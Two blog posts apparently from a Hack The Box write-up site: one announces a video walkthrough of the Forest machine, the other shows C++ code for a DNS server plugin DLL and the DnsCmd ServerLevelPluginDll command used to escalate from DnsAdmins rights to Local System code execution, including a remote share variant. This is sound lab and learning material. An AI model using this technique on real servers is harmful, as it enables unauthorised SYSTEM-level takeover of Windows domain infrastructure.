Tag Archives: HackTheBox

vbscrub 1:55 am on March 23, 2020
Tags: hack the box, HackTheBox, , HTB Forest   

Hack The Box – Forest (Video Walkthrough)

Recently uploaded my video guide to the HTB Forest machine that was retired this weekend:

To get a good understanding of everything in this one, I’d recommend watching the two videos below as well:

vbscrub 5:01 am on January 11, 2020
Tags: DNS Admins exploit, DNS server, DnsPluginCleanup, DnsPluginInitialize, DnsPluginQuery, HackTheBox   

DNS Server Plugin DLL Example (DnsPluginInitialize etc)

There’s a great blog post from Shay Ber on this subject already, but when I tried to follow along myself I hit a few stumbling blocks with the C++ parts as I’ve got no experience with that language (and after using it, my god I realise how spoiled we are with languages like C#.NET).

Anyway, here’s what I ended up doing to make it all work for me:

//DnsPlugin.h file

#define DNSPLUGIN_API extern "C" __declspec(dllexport)

DNSPLUGIN_API int DnsPluginInitialize(PVOID, PVOID);
DNSPLUGIN_API int DnsPluginCleanup();
DNSPLUGIN_API int DnsPluginQuery(PVOID, PVOID,PVOID,PVOID);

//DnsPlugin.cpp file

DNSPLUGIN_API int DnsPluginInitialize(PVOID a1, PVOID a2) { 
	doStuff(); //Runs as LOCAL SYSTEM
	return 0;
}

DNSPLUGIN_API int DnsPluginCleanup(){
	return 0;
}

DNSPLUGIN_API int DnsPluginQuery(PVOID a1,PVOID a2,PVOID a3,PVOID a4){
	return 0;
}

A few notes:

I changed the target architecture to X64 instead of X86, as all versions of Windows Server since 2008 have been x64 only (plus I had some weird compiler errors when targeting Win32 that magically went away when I changed to X64).

In Shay’s original code example he mentions having to use a linker export option to get the correct function signature exported for the DLL, but I had a lot of issues with copying his method and ended up just using this instead as you can see in the code above:

#define DNSPLUGIN_API extern "C" __declspec(dllexport)

I also found that the DNS service would crash with a “module not found” error when trying to load my DLL at first, because it didn’t have the correct C++ runtime installed so it couldn’t find MSVCR100.dll. A simple solution to that was to change the project properties to “Multi threaded /MT” instead of the default “Multi threaded DLL /MD”. Again I’m very new to C++ but from what I gather this means that the dependency on MSVCR100 will be embedded in the DLL and not dynamically linked to at runtime, so now the target server doesn’t need to have the correct version of C++ runtime installed.

So yeah, once I had done all that I copied my DLL over to the target machine where I only had DnsAdmin rights and used this command:

DnsCmd /Config /ServerLevelPluginDll "C:\PathToDnsPlugin.dll"

Alternatively you can use a UNC path, so you could make a share on your PC and then have it point to that (if you can’t copy files to the target machine).

Now we restart the DNS service, and it worked! Any code I put in the “doStuff” function in my code above will be executed as Local System.